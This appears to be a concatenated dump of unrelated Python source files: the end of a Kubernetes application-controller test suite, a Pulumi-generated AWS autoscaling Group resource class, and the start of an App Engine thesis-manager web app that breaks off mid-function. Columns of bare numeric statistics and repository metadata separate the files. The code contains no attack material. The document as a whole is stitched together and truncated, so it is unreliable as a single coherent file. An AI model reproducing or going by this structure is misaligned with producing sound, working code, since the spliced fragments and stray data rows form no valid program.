        await controller.prepare(client)
        # The resource is received by the controller, which starts the reconciliation
        # loop, migrates the application and updates the DB accordingly.
        await controller.resource_received(app)
        assert "cron1" in kubernetes_server_A.app["deleted"]
        assert "cron2" in kubernetes_server_B.app["created"]
        stored = await db.get(
            Application, namespace=app.metadata.namespace, name=app.metadata.name
        )
        assert stored.status.last_applied_manifest == app.spec.manifest
        # The resource doesn't contain any list (therefore no special control
        # dictionary is present in last_observed_manifest), and no custom
        # observer_schema is used (therefore all fields present in
        # spec.manifest are observed). In this specific case, the
        # last_observed_manifest should be equal to spec.manifest.
        assert stored.status.last_observed_manifest == app.spec.manifest
        assert stored.status.state == ApplicationState.RUNNING
        assert stored.status.running_on == resource_ref(cluster_B)
        # Ownership follows the migration: A relinquished, B retained.
        assert resource_ref(cluster_A) not in stored.metadata.owners
        assert resource_ref(cluster_B) in stored.metadata.owners
async def test_app_custom_resource_deletion_non_ns(aiohttp_server, config, db, loop):
    """Test the deletion of an application based on a non-namespaced
    (cluster-scoped) custom resource.

    Mirrors ``test_app_custom_resource_deletion`` but with a cluster-scoped
    CRD, so the DELETE URL served by the fake Kubernetes API contains no
    namespace segment. After the controller handles the deleted Application,
    it must be gone from the database.
    """
    kubernetes_app = web.Application()
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of the custom resource definition
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        if request.match_info["name"] == "crontabs.stable.example.com":
            return web.Response(
                status=200,
                body=json.dumps(crontab_crd(namespaced=False)),
                content_type="application/json",
            )
        return web.Response(status=404)

    # As part of the deletion, the k8s controller deletes the cluster-scoped
    # CronTab named `cron`.
    @routes.delete("/apis/stable.example.com/v1/crontabs/cron")
    async def _(request):
        return web.Response(status=200)

    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)
    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    # The Application is already marked as deleted and holds the finalizer,
    # so the controller must clean up the cluster resources and let the API
    # remove the Application from the database.
    app = ApplicationFactory(
        metadata__deleted=fake.date_time(tzinfo=pytz.utc),
        status__state=ApplicationState.RUNNING,
        status__scheduled_to=resource_ref(cluster),
        status__running_on=resource_ref(cluster),
        metadata__finalizers=["kubernetes_resources_deletion"],
        status__last_observed_manifest=[create_cron_resource()],
    )
    assert resource_ref(cluster) in app.metadata.owners
    await db.put(cluster)
    await db.put(app)
    server = await aiohttp_server(create_app(config))
    async with Client(url=server_endpoint(server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(server), worker_count=0)
        await controller.prepare(client)
        await controller.resource_received(app, start_observer=False)
        # Once the finalizer has been removed, the Application should have
        # been deleted from the database.
        stored = await db.get(
            Application, namespace=app.metadata.namespace, name=app.metadata.name
        )
        assert stored is None
async def test_app_custom_resource_error_handling(aiohttp_server, config, db, loop):
    """Test the error handling when the custom resource definition cannot be
    fetched from the cluster.

    The fake Kubernetes API answers every CRD lookup with HTTP 403, so the
    controller must fail the reconciliation by raising an
    ``InvalidCustomResourceDefinitionError`` whose message contains the HTTP
    status code.
    """
    routes = web.RouteTableDef()

    # Determine scope, version, group and plural of custom resource definition.
    # The lookup always fails with 403 to trigger the error path.
    @routes.get("/apis/apiextensions.k8s.io/v1beta1/customresourcedefinitions/{name}")
    async def _(request):
        return web.Response(status=403)

    kubernetes_app = web.Application()
    kubernetes_app.add_routes(routes)
    kubernetes_server = await aiohttp_server(kubernetes_app)
    cluster = ClusterFactory(
        spec__kubeconfig=make_kubeconfig(kubernetes_server),
        spec__custom_resources=["crontabs.stable.example.com"],
    )
    app = ApplicationFactory(
        status__state=ApplicationState.PENDING,
        status__scheduled_to=resource_ref(cluster),
        status__is_scheduled=False,
        spec__manifest=[create_cron_resource()],
    )
    await db.put(cluster)
    await db.put(app)
    api_server = await aiohttp_server(create_app(config))
    async with Client(url=server_endpoint(api_server), loop=loop) as client:
        controller = KubernetesController(server_endpoint(api_server), worker_count=0)
        await controller.prepare(client)
        with pytest.raises(InvalidCustomResourceDefinitionError, match="403"):
            await controller.resource_received(app)
| 39.158746
| 88
| 0.68741
| 4,624
| 38,728
| 5.572448
| 0.058607
| 0.014903
| 0.029185
| 0.034812
| 0.914619
| 0.904917
| 0.901347
| 0.88951
| 0.883688
| 0.88365
| 0
| 0.010824
| 0.215167
| 38,728
| 988
| 89
| 39.198381
| 0.836914
| 0.167527
| 0
| 0.767584
| 0
| 0
| 0.130888
| 0.091334
| 0
| 0
| 0
| 0
| 0.076453
| 1
| 0.001529
| false
| 0
| 0.027523
| 0.001529
| 0.107034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b31435eafac3eb6914b84c1f42bf9353e8e30f9b
| 43,326
|
py
|
Python
|
sdk/python/pulumi_aws/autoscaling/group.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/autoscaling/group.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_aws/autoscaling/group.py
|
dixler/pulumi-aws
|
88838ed6d412c092717a916b0b5b154f68226c3a
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import json
import warnings
import pulumi
import pulumi.runtime
from typing import Union
from .. import utilities, tables
class Group(pulumi.CustomResource):
arn: pulumi.Output[str]
"""
The ARN for this AutoScaling Group
"""
availability_zones: pulumi.Output[list]
"""
A list of one or more availability zones for the group. This parameter should not be specified when using `vpc_zone_identifier`.
"""
default_cooldown: pulumi.Output[float]
"""
The amount of time, in seconds, after a scaling activity completes before another scaling activity can start.
"""
desired_capacity: pulumi.Output[float]
"""
The number of Amazon EC2 instances that
should be running in the group. (See also Waiting for
Capacity below.)
"""
enabled_metrics: pulumi.Output[list]
"""
A list of metrics to collect. The allowed values are `GroupDesiredCapacity`, `GroupInServiceCapacity`, `GroupPendingCapacity`, `GroupMinSize`, `GroupMaxSize`, `GroupInServiceInstances`, `GroupPendingInstances`, `GroupStandbyInstances`, `GroupStandbyCapacity`, `GroupTerminatingCapacity`, `GroupTerminatingInstances`, `GroupTotalCapacity`, `GroupTotalInstances`.
* `wait_for_capacity_timeout` (Default: "10m") A maximum
[duration](https://golang.org/pkg/time/#ParseDuration) that this provider should
wait for ASG instances to be healthy before timing out. (See also Waiting
for Capacity below.) Setting this to "0" causes
this provider to skip all Capacity Waiting behavior.
"""
force_delete: pulumi.Output[bool]
"""
Allows deleting the autoscaling group without waiting
for all instances in the pool to terminate. You can force an autoscaling group to delete
even if it's in the process of scaling a resource. Normally, this provider
drains all the instances before deleting the group. This bypasses that
behavior and potentially leaves resources dangling.
"""
health_check_grace_period: pulumi.Output[float]
"""
Time (in seconds) after instance comes into service before checking health.
"""
health_check_type: pulumi.Output[str]
"""
"EC2" or "ELB". Controls how health checking is done.
"""
initial_lifecycle_hooks: pulumi.Output[list]
"""
One or more
[Lifecycle Hooks](http://docs.aws.amazon.com/autoscaling/latest/userguide/lifecycle-hooks.html)
to attach to the autoscaling group **before** instances are launched. The
syntax is exactly the same as the separate
[`autoscaling.LifecycleHook`](https://www.terraform.io/docs/providers/aws/r/autoscaling_lifecycle_hook.html)
resource, without the `autoscaling_group_name` attribute. Please note that this will only work when creating
a new autoscaling group. For all other use-cases, please use `autoscaling.LifecycleHook` resource.
* `default_result` (`str`)
* `heartbeat_timeout` (`float`)
* `lifecycle_transition` (`str`)
* `name` (`str`) - The name of the auto scaling group. By default generated by this provider.
* `notification_metadata` (`str`)
* `notification_target_arn` (`str`)
* `role_arn` (`str`)
"""
launch_configuration: pulumi.Output[str]
"""
The name of the launch configuration to use.
"""
launch_template: pulumi.Output[dict]
"""
Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
* `id` (`str`) - The autoscaling group id.
* `name` (`str`) - The name of the auto scaling group. By default generated by this provider.
* `version` (`str`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
"""
load_balancers: pulumi.Output[list]
"""
A list of elastic load balancer names to add to the autoscaling
group names. Only valid for classic load balancers. For ALBs, use `target_group_arns` instead.
"""
max_instance_lifetime: pulumi.Output[float]
"""
The maximum amount of time, in seconds, that an instance can be in service, values must be either equal to 0 or between 604800 and 31536000 seconds.
"""
max_size: pulumi.Output[float]
"""
The maximum size of the auto scale group.
"""
metrics_granularity: pulumi.Output[str]
"""
The granularity to associate with the metrics to collect. The only valid value is `1Minute`. Default is `1Minute`.
"""
min_elb_capacity: pulumi.Output[float]
"""
Setting this causes this provider to wait for
this number of instances from this autoscaling group to show up healthy in the
ELB only on creation. Updates will not wait on ELB instance number changes.
(See also Waiting for Capacity below.)
"""
min_size: pulumi.Output[float]
"""
The minimum size of the auto scale group.
(See also Waiting for Capacity below.)
"""
mixed_instances_policy: pulumi.Output[dict]
"""
Configuration block containing settings to define launch targets for Auto Scaling groups. Defined below.
* `instancesDistribution` (`dict`) - Nested argument containing settings on how to mix on-demand and Spot instances in the Auto Scaling group. Defined below.
* `onDemandAllocationStrategy` (`str`) - Strategy to use when launching on-demand instances. Valid values: `prioritized`. Default: `prioritized`.
* `onDemandBaseCapacity` (`float`) - Absolute minimum amount of desired capacity that must be fulfilled by on-demand instances. Default: `0`.
* `onDemandPercentageAboveBaseCapacity` (`float`) - Percentage split between on-demand and Spot instances above the base on-demand capacity. Default: `100`.
* `spotAllocationStrategy` (`str`) - How to allocate capacity across the Spot pools. Valid values: `lowest-price`, `capacity-optimized`. Default: `lowest-price`.
* `spotInstancePools` (`float`) - Number of Spot pools per availability zone to allocate capacity. EC2 Auto Scaling selects the cheapest Spot pools and evenly allocates Spot capacity across the number of Spot pools that you specify. Default: `2`.
* `spotMaxPrice` (`str`) - Maximum price per unit hour that the user is willing to pay for the Spot instances. Default: an empty string which means the on-demand price.
* `launch_template` (`dict`) - Nested argument containing launch template settings along with the overrides to specify multiple instance types and weights. Defined below.
* `launchTemplateSpecification` (`dict`) - Nested argument defines the Launch Template. Defined below.
* `launchTemplateId` (`str`) - The ID of the launch template. Conflicts with `launch_template_name`.
* `launchTemplateName` (`str`) - The name of the launch template. Conflicts with `launch_template_id`.
* `version` (`str`) - Template version. Can be version number, `$Latest`, or `$Default`. (Default: `$Default`).
* `overrides` (`list`) - List of nested arguments provides the ability to specify multiple instance types. This will override the same parameter in the launch template. For on-demand instances, Auto Scaling considers the order of preference of instance types to launch based on the order specified in the overrides list. Defined below.
* `instanceType` (`str`) - Override the instance type in the Launch Template.
* `weightedCapacity` (`str`) - The number of capacity units, which gives the instance type a proportional weight to other instance types.
"""
name: pulumi.Output[str]
"""
The name of the auto scaling group. By default generated by this provider.
"""
name_prefix: pulumi.Output[str]
"""
Creates a unique name beginning with the specified
prefix. Conflicts with `name`.
"""
placement_group: pulumi.Output[str]
"""
The name of the placement group into which you'll launch your instances, if any.
"""
protect_from_scale_in: pulumi.Output[bool]
"""
Allows setting instance protection. The
autoscaling group will not select instances with this setting for terminination
during scale in events.
"""
service_linked_role_arn: pulumi.Output[str]
"""
The ARN of the service-linked role that the ASG will use to call other AWS services
"""
suspended_processes: pulumi.Output[list]
"""
A list of processes to suspend for the AutoScaling Group. The allowed values are `Launch`, `Terminate`, `HealthCheck`, `ReplaceUnhealthy`, `AZRebalance`, `AlarmNotification`, `ScheduledActions`, `AddToLoadBalancer`.
Note that if you suspend either the `Launch` or `Terminate` process types, it can prevent your autoscaling group from functioning properly.
"""
tags: pulumi.Output[list]
"""
A list of tag blocks. Tags documented below.
* `key` (`str`) - Key
* `propagateAtLaunch` (`bool`) - Enables propagation of the tag to
Amazon EC2 instances launched via this ASG
* `value` (`str`) - Value
"""
tags_collection: pulumi.Output[list]
"""
A list of tag blocks (maps). Tags documented below.
"""
target_group_arns: pulumi.Output[list]
"""
A list of `alb.TargetGroup` ARNs, for use with Application or Network Load Balancing.
"""
termination_policies: pulumi.Output[list]
"""
A list of policies to decide how the instances in the auto scale group should be terminated. The allowed values are `OldestInstance`, `NewestInstance`, `OldestLaunchConfiguration`, `ClosestToNextInstanceHour`, `OldestLaunchTemplate`, `AllocationStrategy`, `Default`.
"""
vpc_zone_identifiers: pulumi.Output[list]
"""
A list of subnet IDs to launch resources in.
"""
wait_for_capacity_timeout: pulumi.Output[str]
wait_for_elb_capacity: pulumi.Output[float]
"""
Setting this will cause this provider to wait
for exactly this number of healthy instances from this autoscaling group in
all attached load balancers on both create and update operations. (Takes
precedence over `min_elb_capacity` behavior.)
(See also Waiting for Capacity below.)
"""
def __init__(__self__, resource_name, opts=None, availability_zones=None, default_cooldown=None, desired_capacity=None, enabled_metrics=None, force_delete=None, health_check_grace_period=None, health_check_type=None, initial_lifecycle_hooks=None, launch_configuration=None, launch_template=None, load_balancers=None, max_instance_lifetime=None, max_size=None, metrics_granularity=None, min_elb_capacity=None, min_size=None, mixed_instances_policy=None, name=None, name_prefix=None, placement_group=None, protect_from_scale_in=None, service_linked_role_arn=None, suspended_processes=None, tags=None, tags_collection=None, target_group_arns=None, termination_policies=None, vpc_zone_identifiers=None, wait_for_capacity_timeout=None, wait_for_elb_capacity=None, __props__=None, __name__=None, __opts__=None):
    """
    Create an AutoScaling Group resource.

    > **Note:** You must specify either `launch_configuration`, `launch_template`,
    or `mixed_instances_policy`. `max_size` and `min_size` are required.

    After creation this provider waits for `min_size` (or `desired_capacity`, if
    given) healthy instances, up to `wait_for_capacity_timeout` (default "10m";
    "0" disables waiting). With attached ELBs/ALBs, `min_elb_capacity` waits for
    that many `"InService"` instances on creation only, while
    `wait_for_elb_capacity` waits for exactly that number on both create and
    update and takes precedence.

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[list] availability_zones: Availability zones for the group; do not combine with `vpc_zone_identifiers`.
    :param pulumi.Input[float] default_cooldown: Seconds after a scaling activity before another may start.
    :param pulumi.Input[float] desired_capacity: Number of EC2 instances that should be running in the group.
    :param pulumi.Input[list] enabled_metrics: Metrics to collect (e.g. `GroupMinSize`, `GroupMaxSize`, `GroupTotalInstances`, ...).
    :param pulumi.Input[bool] force_delete: Delete the group without draining instances first.
    :param pulumi.Input[float] health_check_grace_period: Seconds after launch before health checking starts.
    :param pulumi.Input[str] health_check_type: "EC2" or "ELB".
    :param pulumi.Input[list] initial_lifecycle_hooks: Lifecycle hooks attached before instances launch (creation only).
    :param pulumi.Input[str] launch_configuration: Name of the launch configuration to use.
    :param pulumi.Input[dict] launch_template: Launch template settings (`id`, `name`, `version`).
    :param pulumi.Input[list] load_balancers: Classic ELB names; for ALBs use `target_group_arns`.
    :param pulumi.Input[float] max_instance_lifetime: Max seconds an instance may be in service (0, or 604800-31536000).
    :param pulumi.Input[float] max_size: The maximum size of the auto scale group. **Required.**
    :param pulumi.Input[str] metrics_granularity: Metrics granularity; only `1Minute` is valid.
    :param pulumi.Input[float] min_elb_capacity: Healthy-in-ELB instance count to wait for on creation.
    :param pulumi.Input[float] min_size: The minimum size of the auto scale group. **Required.**
    :param pulumi.Input[dict] mixed_instances_policy: Mixed on-demand/Spot launch configuration.
    :param pulumi.Input[str] name: Group name; auto-generated by default.
    :param pulumi.Input[str] name_prefix: Unique-name prefix; conflicts with `name`.
    :param pulumi.Input[str] placement_group: Placement group for launched instances.
    :param pulumi.Input[bool] protect_from_scale_in: Protect instances from termination during scale-in.
    :param pulumi.Input[str] service_linked_role_arn: Service-linked role ARN used to call other AWS services.
    :param pulumi.Input[list] suspended_processes: Process types to suspend (`Launch`, `Terminate`, ...).
    :param pulumi.Input[list] tags: Tag blocks (`key`, `value`, `propagateAtLaunch`).
    :param pulumi.Input[list] tags_collection: Tag blocks as plain maps.
    :param pulumi.Input[list] target_group_arns: `alb.TargetGroup` ARNs for ALB/NLB attachment.
    :param pulumi.Input[list] termination_policies: Termination policy names (`OldestInstance`, `Default`, ...).
    :param pulumi.Input[list] vpc_zone_identifiers: Subnet IDs to launch resources in.
    :param pulumi.Input[str] wait_for_capacity_timeout: Max duration to wait for healthy instances; "0" disables.
    :param pulumi.Input[float] wait_for_elb_capacity: Exact healthy-in-ELB count to wait for on create and update.

    > This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/autoscaling_group.html.markdown.
    """
    # Honor the deprecated positional aliases before doing anything else.
    if __name__ is not None:
        warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
        resource_name = __name__
    if __opts__ is not None:
        warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
        opts = __opts__
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = utilities.get_version()
    if opts.id is None:
        # Creating a brand-new resource: build the property bag ourselves.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        if max_size is None:
            raise TypeError("Missing required property 'max_size'")
        if min_size is None:
            raise TypeError("Missing required property 'min_size'")
        __props__ = {
            'availability_zones': availability_zones,
            'default_cooldown': default_cooldown,
            'desired_capacity': desired_capacity,
            'enabled_metrics': enabled_metrics,
            'force_delete': force_delete,
            'health_check_grace_period': health_check_grace_period,
            'health_check_type': health_check_type,
            'initial_lifecycle_hooks': initial_lifecycle_hooks,
            'launch_configuration': launch_configuration,
            'launch_template': launch_template,
            'load_balancers': load_balancers,
            'max_instance_lifetime': max_instance_lifetime,
            'max_size': max_size,
            'metrics_granularity': metrics_granularity,
            'min_elb_capacity': min_elb_capacity,
            'min_size': min_size,
            'mixed_instances_policy': mixed_instances_policy,
            'name': name,
            'name_prefix': name_prefix,
            'placement_group': placement_group,
            'protect_from_scale_in': protect_from_scale_in,
            'service_linked_role_arn': service_linked_role_arn,
            'suspended_processes': suspended_processes,
            'tags': tags,
            'tags_collection': tags_collection,
            'target_group_arns': target_group_arns,
            'termination_policies': termination_policies,
            'vpc_zone_identifiers': vpc_zone_identifiers,
            'wait_for_capacity_timeout': wait_for_capacity_timeout,
            'wait_for_elb_capacity': wait_for_elb_capacity,
            'arn': None,  # output-only; filled in by the engine after creation
        }
    super(Group, __self__).__init__(
        'aws:autoscaling/group:Group',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name, id, opts=None, arn=None, availability_zones=None, default_cooldown=None, desired_capacity=None, enabled_metrics=None, force_delete=None, health_check_grace_period=None, health_check_type=None, initial_lifecycle_hooks=None, launch_configuration=None, launch_template=None, load_balancers=None, max_instance_lifetime=None, max_size=None, metrics_granularity=None, min_elb_capacity=None, min_size=None, mixed_instances_policy=None, name=None, name_prefix=None, placement_group=None, protect_from_scale_in=None, service_linked_role_arn=None, suspended_processes=None, tags=None, tags_collection=None, target_group_arns=None, termination_policies=None, vpc_zone_identifiers=None, wait_for_capacity_timeout=None, wait_for_elb_capacity=None):
    """
    Look up an existing Group resource by name and provider id, optionally
    seeding its state with the given property values.

    All keyword arguments mirror the constructor's inputs; see `__init__` for
    their meanings. Additionally:

    :param str resource_name: The unique name of the resulting resource.
    :param str id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] arn: The ARN for this AutoScaling Group.

    > This content is derived from https://github.com/terraform-providers/terraform-provider-aws/blob/master/website/docs/r/autoscaling_group.html.markdown.
    """
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    # Collect every known property into the state bag; None entries are
    # simply "not specified" and leave the live value untouched.
    __props__ = {
        "arn": arn,
        "availability_zones": availability_zones,
        "default_cooldown": default_cooldown,
        "desired_capacity": desired_capacity,
        "enabled_metrics": enabled_metrics,
        "force_delete": force_delete,
        "health_check_grace_period": health_check_grace_period,
        "health_check_type": health_check_type,
        "initial_lifecycle_hooks": initial_lifecycle_hooks,
        "launch_configuration": launch_configuration,
        "launch_template": launch_template,
        "load_balancers": load_balancers,
        "max_instance_lifetime": max_instance_lifetime,
        "max_size": max_size,
        "metrics_granularity": metrics_granularity,
        "min_elb_capacity": min_elb_capacity,
        "min_size": min_size,
        "mixed_instances_policy": mixed_instances_policy,
        "name": name,
        "name_prefix": name_prefix,
        "placement_group": placement_group,
        "protect_from_scale_in": protect_from_scale_in,
        "service_linked_role_arn": service_linked_role_arn,
        "suspended_processes": suspended_processes,
        "tags": tags,
        "tags_collection": tags_collection,
        "target_group_arns": target_group_arns,
        "termination_policies": termination_policies,
        "vpc_zone_identifiers": vpc_zone_identifiers,
        "wait_for_capacity_timeout": wait_for_capacity_timeout,
        "wait_for_elb_capacity": wait_for_elb_capacity,
    }
    return Group(resource_name, opts=opts, __props__=__props__)
def translate_output_property(self, prop):
    """Map a camelCase provider property name to its snake_case Python form."""
    snake = tables._CAMEL_TO_SNAKE_CASE_TABLE.get(prop)
    return snake if snake else prop
def translate_input_property(self, prop):
    """Map a snake_case Python property name to its camelCase provider form."""
    camel = tables._SNAKE_TO_CAMEL_CASE_TABLE.get(prop)
    return camel if camel else prop
| 72.21
| 809
| 0.705489
| 5,399
| 43,326
| 5.500833
| 0.096499
| 0.042594
| 0.031786
| 0.013468
| 0.867201
| 0.853025
| 0.841779
| 0.83417
| 0.824135
| 0.820331
| 0
| 0.00262
| 0.216013
| 43,326
| 599
| 810
| 72.330551
| 0.871728
| 0.550409
| 0
| 0.014815
| 1
| 0
| 0.158923
| 0.045524
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02963
| false
| 0.007407
| 0.044444
| 0.014815
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6415aa18974046c07b3d31b0ea95eebcfd3bca37
| 79,150
|
py
|
Python
|
main.py
|
CoE-3/pup-dbms-thesis-manager-3
|
17382d8ffa4532046a334da3096bae260e308d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
CoE-3/pup-dbms-thesis-manager-3
|
17382d8ffa4532046a334da3096bae260e308d01
|
[
"Apache-2.0"
] | null | null | null |
main.py
|
CoE-3/pup-dbms-thesis-manager-3
|
17382d8ffa4532046a334da3096bae260e308d01
|
[
"Apache-2.0"
] | null | null | null |
import webapp2
from google.appengine.api import users
from google.appengine.ext import ndb
import jinja2
import os
import logging
import json
import csv
# Module-level Jinja2 environment: templates are loaded from this file's
# directory, and autoescaping is enabled for every rendered template.
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True)
class thesisentry(ndb.Model):
    """Datastore entity for a single thesis record.

    Advisers, departments, and proponents are stored as keys to their
    respective `Faculty`, `Department`, and `Student` entities.
    """

    thesis_year = ndb.StringProperty()
    thesis_title = ndb.StringProperty(indexed=True)
    thesis_abstract = ndb.TextProperty()
    thesis_adviser = ndb.KeyProperty(kind='Faculty',indexed=True)
    thesis_section = ndb.StringProperty()
    thesis_department = ndb.KeyProperty(kind='Department',indexed=True)
    thesis_proponent = ndb.KeyProperty(kind='Student', repeated=True)
    thesis_tags = ndb.StringProperty(repeated=True)
    thesis_author = ndb.KeyProperty(indexed=True)
    date = ndb.DateTimeProperty(auto_now_add=True)

    @classmethod
    def get_by_name(model, name):
        """Return the first thesis whose title equals `name`, or None."""
        try:
            return model.query(model.thesis_title == name).get()
        except Exception:
            # Best-effort lookup: any datastore failure is reported as "not found".
            return None
class User(ndb.Model):
    """Application user account.

    NOTE(review): entity appears to be keyed by the App Engine user_id
    (see the `ndb.Key('User', ...)` construction in the request handler) —
    confirm before relying on it.
    """

    email = ndb.StringProperty(indexed=True)
    first_name = ndb.StringProperty()
    last_name = ndb.StringProperty()
    phone_number = ndb.IntegerProperty()
    is_admin = ndb.BooleanProperty()  # grants access to the admin views
    created_date = ndb.DateTimeProperty(auto_now_add=True)  # set once on first put()
class Faculty(ndb.Model):
    """Datastore entity for a faculty member, linked to a Department by key."""

    faculty_title = ndb.StringProperty(indexed=True)
    faculty_fname = ndb.StringProperty(indexed=True)
    faculty_sname = ndb.StringProperty(indexed=True)
    faculty_full = ndb.StringProperty(indexed=True)
    faculty_email = ndb.StringProperty(indexed=True)
    faculty_phone = ndb.StringProperty(indexed=True)
    faculty_bday = ndb.StringProperty(indexed=True)
    faculty_department = ndb.KeyProperty(kind='Department', indexed=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)

    @classmethod
    def get_by_name(model, name):
        """Return the faculty member whose full name equals `name`, or None."""
        try:
            return model.query(model.faculty_full == name).get()
        except Exception:
            return None

    @classmethod
    def get_by_keyname(model, key):
        """Fetch a faculty entity by its datastore id; None on any failure."""
        try:
            return model.get_by_id(key)
        except Exception:
            return None
class Student(ndb.Model):
    """Student; ``student_name_portions`` holds name words for searching."""
    student_fname = ndb.StringProperty(indexed=True)
    student_sname = ndb.StringProperty(indexed=True)
    student_full = ndb.StringProperty(indexed=True)
    student_email = ndb.StringProperty(indexed=True)
    student_phone = ndb.StringProperty(indexed=True)
    student_number = ndb.StringProperty(indexed=True)
    student_graduated = ndb.IntegerProperty(indexed=True)
    student_bday = ndb.StringProperty(indexed=True)
    student_department = ndb.KeyProperty(kind='Department', indexed=True)
    student_name_portions = ndb.StringProperty(repeated=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)

    @classmethod
    def get_by_name(cls, name):
        """Return the first student whose full name equals ``name``, or None."""
        try:
            return cls.query(cls.student_full == name).get()
        except Exception:
            return None
class University(ndb.Model):
    """University; keyed by its lowercased initialism (see UniversityHandler)."""
    university_name = ndb.StringProperty(indexed=True)
    university_initial = ndb.StringProperty(indexed=True)
    university_address = ndb.StringProperty(indexed=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
class Department(ndb.Model):
    """Academic department; links back to its College and chair Faculty."""
    department_college = ndb.KeyProperty(kind='College', indexed=True)
    department_name = ndb.StringProperty(indexed=True)
    department_chair = ndb.KeyProperty(kind='Faculty', indexed=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)

    @classmethod
    def get_by_name(cls, name):
        """Return the first department named ``name``, or None."""
        try:
            return cls.query(cls.department_name == name).get()
        except Exception:
            return None
class College(ndb.Model):
    """College within a university; also caches its departments' keys."""
    college_university = ndb.KeyProperty(kind='University', indexed=True)
    college_name = ndb.StringProperty(indexed=True)
    # Maintained by DepartmentHandler.post whenever a department is created.
    college_departments = ndb.KeyProperty(repeated=True)
    created_date = ndb.DateTimeProperty(auto_now_add=True)
class MainPageHandler(webapp2.RequestHandler):
    def get(self):
        """Render the home page.

        - anonymous visitor: login page with a sign-in link
        - signed-in but unregistered: redirect to /register
        - registered user: main menu (admins also get "Create Entry" links)

        Fixes: removed the unused ``link_text`` locals and the duplicated
        template-rendering code; flattened nesting with guard clauses.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        if user.is_admin:
            links = {
                'Faculty': {'List': '/faculty/list', 'Create Entry': '/faculty/create'},
                'Students': {'List': '/student/list', 'Create Entry': '/student/create'},
                'Department': {'List': '/department/list', 'Create Entry': '/department/create'},
                'Universities': {'List': '/university/list', 'Create Entry': '/university/create'},
                'Colleges': {'List': '/college/list', 'Create Entry': '/college/create'},
                'Theses': {'List': '/thesis/list/all', 'Create Entry': '/thesis/create'},
            }
        else:
            # NOTE(review): non-admins see 'Departments' (plural) while admins
            # see 'Department' -- kept as-is to preserve the rendered labels.
            links = {
                'Faculty': {'List': '/faculty/list'},
                'Students': {'List': '/student/list'},
                'Universities': {'List': '/university/list'},
                'Colleges': {'List': '/college/list'},
                'Departments': {'List': '/department/list'},
                'Theses': {'List': '/thesis/list/all'},
            }
        template_values = {
            'links': links,
            'search_url': '/search',
            'logout_url': users.create_logout_url('/'),
            'user': user.first_name,
        }
        template = JINJA_ENVIRONMENT.get_template('/pages/main.html')
        self.response.write(template.render(template_values))
class APIHandler(webapp2.RequestHandler):
    def get(self):
        """Return every thesis as JSON (newest first), with adviser and
        department details denormalized into each entry.

        Fix: Content-Type header was 'application.json', an invalid MIME type.
        """
        loggedin_user = users.get_current_user()
        if not loggedin_user:
            template = JINJA_ENVIRONMENT.get_template('/pages/login.html')
            self.response.write(template.render({
                'login_url': users.create_login_url('/login'),
                'reg_url': '/register',
            }))
            return
        user = ndb.Key('User', loggedin_user.user_id()).get()
        if user is None:
            self.redirect('/register')
            return
        thesis_list = []
        for thesis in thesisentry.query().order(-thesisentry.date).fetch():
            departments = []
            for dept in Department.query(Department.key == thesis.thesis_department):
                college = dept.department_college.get()
                university = college.college_university.get()
                departments.append({
                    'name': dept.department_name,
                    'college': college.college_name,
                    'university': university.university_name,
